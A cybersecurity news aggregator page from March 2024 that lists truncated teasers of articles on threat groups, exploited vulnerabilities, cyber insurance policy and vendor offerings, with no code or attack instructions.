doesn’t favor a government-funded cyber insurnace backstop. (Image: Shutterstock) The Conservative government of […] La entrada UK Conservatives Say ‘No’ to Cyber Insurance Backstop – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Leadership & Executive Communication , Next-Generation Technologies & Secure Development Also: Palo Alto Networks’ Strategy Pivot; Massive Change Healthcare Cyberattack Anna Delaney (annamadeline) •   show more ...

March 8, 2024     Clockwise, from top left: Anna Delaney, Tom Field, Michael Novinson, and Marianne Kolbasuk McGee In […] La entrada ISMG Editors: Our Pledge to You in a New Era of Journalism – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Mayank Parmar YouTube is no longer showing recommended videos to users logged out of a Google account or using Incognito mode, making people concerned they are being bullied into always being signed into the service. This change, which is now rolling out, shows a   show more ...

simple YouTube homepage without any videos or […] La entrada YouTube stops recommending videos when signed out of Google – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BLEEPINGCOMPUTER

Source: www.bleepingcomputer.com – Author: Bill Toulas Image: Midjourney A financially motivated hacking group named Magnet Goblin uses various 1-day vulnerabilities to breach public-facing servers and deploy custom malware on Windows and Linux systems. 1-day flaws refer to publicly disclosed vulnerabilities   show more ...

for which a patch has been released. Threat actors looking to exploit these flaws must […] La entrada Magnet Goblin hackers use 1-day flaws to drop custom Linux malware – Source: www.bleepingcomputer.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.troyhunt.com – Author: Troy Hunt Let me begin by quoting Stefan during the livestream: “​​Turns out having tons of data integrity is expensive”. Yeah, and working with tons of data in a fashion that’s both fast and cost effective is bloody painful. I’m reminded of the old   show more ...

“fast, good and cheap – pick 2” […] La entrada Weekly Update 390 – Source: www.troyhunt.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.techrepublic.com – Author: TechRepublic Academy Published March 11, 2024 We may earn from vendors via affiliate links or sponsorships. This might affect product placement on our site, but not the content of our reviews. See our Terms of Use for details. One of the web’s biggest cybersecurity   show more ...

training resources, The Complete 2024 Cyber Security […] La entrada If your Business Needs Cybersecurity, you Should Become the Expert – Source: www.techrepublic.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: go.theregister.com – Author: Team Register Infosec in brief Cybersecurity researchers informed Microsoft that Notorious North Korean hackers Lazarus Group discovered the “holy grail” of rootkit vulnerabilities in Windows last year, but Redmond still took six months to patch the problem.   show more ...

Researchers at Avast said they informed Microsoft of a serious admin-to-kernel exploit in a […] La entrada Microsoft waited 6 months to patch actively exploited admin-to-kernel vulnerability – Source: go.theregister.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 AI

Source: www.cybertalk.org – Author: slandau EXECUTIVE SUMMARY: AI is revolutionizing businesses worldwide. Enterprises are being reinvented through artificial intelligence. AI is also separating the industry leaders from the industry followers.  In the U.S., 73% of companies have already adopted artificial   show more ...

intelligence. Within certain sectors, experts expect that, on an annual basis, AI could contribute $4.4 […] La entrada A strategic shift to AI-powered and cloud-delivered solutions – Source: www.cybertalk.org se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.schneier.com – Author: Bruce Schneier HomeBlog Comments Flerfer • March 11, 2024 9:56 AM I’ve been wondering if this could be used to help decrypt the Kryptos sculpture considering that part of the phrase has been revealed to help move along a solution. Winter • March 11, 2024 11:01 AM Not   show more ...

sure this is […] La entrada Using LLMs to Unredact Text – Source: www.schneier.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Defense Magazine

Source: www.cyberdefensemagazine.com – Author: Gary Securing Operational Technology ACCESS THE RECORDING Kick-start your OT security program, wherever you are in your journey. Gain industry-specific insights into OT cybersecurity challenges and equip yourself with practical strategies and best practices to   show more ...

enhance OT security. Shape the future of cyber resilience with us! Named Microsoft’s Security Impact Partner […] La entrada OT Security Q&A for Cybersecurity Leaders with Difenda and Microsoft – Source: www.cyberdefensemagazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.cyberdefensemagazine.com – Author: Stevin Attack Surface Management, Dark Web Monitoring, and Application Penetration Testing by Dr. Ilia Kolochenko, CEO and Chief Architect, ImmuniWeb ImmuniWeb SA is a global application security company headquartered in Geneva, Switzerland. The company is   show more ...

profitable, cashflow positive and rapidly growing since its incorporation in 2019. The award-winning ImmuniWeb® AI Platform […] La entrada ImmuniWeb AI Platform – Source: www.cyberdefensemagazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.cyberdefensemagazine.com – Author: News team By Kevin Beasley, CIO, VAI Increased competition and new regulatory requirements are increasing the tempo of digital transformation among mid-market companies. In fact, Deloitte’s 2023 Mid-Market Technology Trend report found that technology spending   show more ...

among this cohort is at its highest level since 2019. However mid-market companies face cybersecurity challenges […] La entrada The Balancing Act for Mid-Market Firms: Navigating Digital Growth and Security Hurdles – Source: www.cyberdefensemagazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.cyberdefensemagazine.com – Author: News team By Ken Cox, President of Hostirian Despite the technological advancements brought by automation and the enhanced capabilities of data analytics that have transformed decision-making processes, the digital age has proved to be a double-edged sword with an   show more ...

unsettling rise in employee monitoring technologies on the other end of its […] La entrada The Ethics And Privacy Concerns Of Employee Monitoring: Insights From Data Privacy Expert Ken Cox – Source: www.cyberdefensemagazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.cyberdefensemagazine.com – Author: News team By Brett Raybould, EMEA Solutions Architect, Menlo Security  Phishing remains one of the most prevalent challenges facing organisations, with more than three billion malicious emails estimated to be sent around the world every day. No-one is immune to   show more ...

the threat of phishing. From aeronautics firms, major banks, and pharmaceutical […] La entrada Phishing Campaign Exploits Open Redirection Vulnerability In ‘Indeed.com’ – Source: www.cyberdefensemagazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.infosecurity-magazine.com – Author: 1 Security researchers have uncovered a trend involving the exploitation of 1-day vulnerabilities, including two in Ivanti Connect Secure VPN.  The flaws, identified as CVE-2023-46805 and CVE-2023-21887, were quickly exploited by multiple threat actors, leading   show more ...

to various malicious activities. Tracking these exploits, the Check Point Research (CPR) team said it encountered […] La entrada Magnet Goblin Exploits Ivanti Vulnerabilities – Source: www.infosecurity-magazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 BianLian

Source: www.infosecurity-magazine.com – Author: 1 The BianLian threat actor has been observed shifting toward extortion-only activities, according to recent findings by GuidePoint’s Research and Intelligence Team (GRIT). Following Avast’s release of a decryptor for BianLian in January 2023, the group has   show more ...

altered its tactics. In a recent incident response, GRIT, in collaboration with GuidePoint’s DFIR […] La entrada BianLian Threat Actor Shifts Focus to Extortion-Only Tactics – Source: www.infosecurity-magazine.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Crime

Source: securityaffairs.com – Author: Pierluigi Paganini BianLian group exploits JetBrains TeamCity bugs in ransomware attacks BianLian ransomware group was spotted exploiting vulnerabilities in JetBrains TeamCity software in recent attacks. Researchers from GuidePoint Security noticed, while investigating a   show more ...

recent attack linked to the BianLian ransomware group, that the threat actors gained initial access to the target […] La entrada BianLian group exploits JetBrains TeamCity bugs in ransomware attacks – Source: securityaffairs.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2024-03
Aggregator history
Monday, March 11
FRI
SAT
SUN
MON
TUE
WED
THU
MarchAprilMay